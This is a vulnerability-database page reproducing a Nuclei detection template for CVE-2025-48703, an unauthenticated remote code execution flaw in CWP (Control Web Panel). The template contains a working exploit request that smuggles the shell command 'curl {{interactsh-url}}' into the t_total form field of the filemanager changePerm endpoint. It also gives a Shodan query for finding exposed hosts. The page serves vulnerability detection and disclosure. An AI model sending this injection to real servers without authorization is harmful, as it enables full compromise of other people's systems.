Lucene search
K

CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

CWP pre-0.9.8.1205 RCE via unauthenticated shell metacharacters in filemanager changePerm.

Related
Refs
Code
id: CVE-2025-48703

info:
  name: CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    CWP (Control Web Panel) < 0.9.8.1205 contains a remote code execution caused by shell metacharacters in the t_total parameter in filemanager changePerm request, letting unauthenticated attackers execute code remotely, exploit requires knowledge of a valid non-root username.
  impact: |
    Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full system compromise.
  remediation: |
    Update to version 0.9.8.1205 or later.
  reference:
    - https://fenrisk.com/rce-centos-webpanel
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48703
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.0
    cve-id: CVE-2025-48703
    epss-score: 0.99589
    epss-percentile: 0.99942
    cwe-id: CWE-78
  metadata:
    verified: false
    shodan-query: 'Server: cwpsrv'
  tags: cve,cve2025,cwp,cwpsrv,rce,intrusive,file-upload,oast,oob,vkev,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /login/index.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'Control WebPanel', 'cwp')"
        condition: and
        internal: true

  - raw:
      - |
        POST /{{username}}/index.php?module=filemanager&acc=changePerm HTTP/1.1
        Host: {{hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrTrcHpS9ovyhBLtb

        ------WebKitFormBoundaryrTrcHpS9ovyhBLtb
        Content-Disposition: form-data; name="fileName"

        .bashrc
        ------WebKitFormBoundaryrTrcHpS9ovyhBLtb
        Content-Disposition: form-data; name="currentPath"

        /home/{{username}}
        ------WebKitFormBoundaryrTrcHpS9ovyhBLtb
        Content-Disposition: form-data; name="recursive"


        ------WebKitFormBoundaryrTrcHpS9ovyhBLtb
        Content-Disposition: form-data; name="t_total"

        curl {{interactsh-url}}
        ------WebKitFormBoundaryrTrcHpS9ovyhBLtb

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4a0a00473045022100d5c81277d8d113f2f8d7765f4c9622bde4e6665eefbc3b6b935fb92b5060751b0220500d214971290343401d66d8e87ea32402bdcd1c1406f2da5b71d855a380a218:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8High risk
Vulners AI Score8
CVSS 3.19
EPSS0.99589
SSVC
17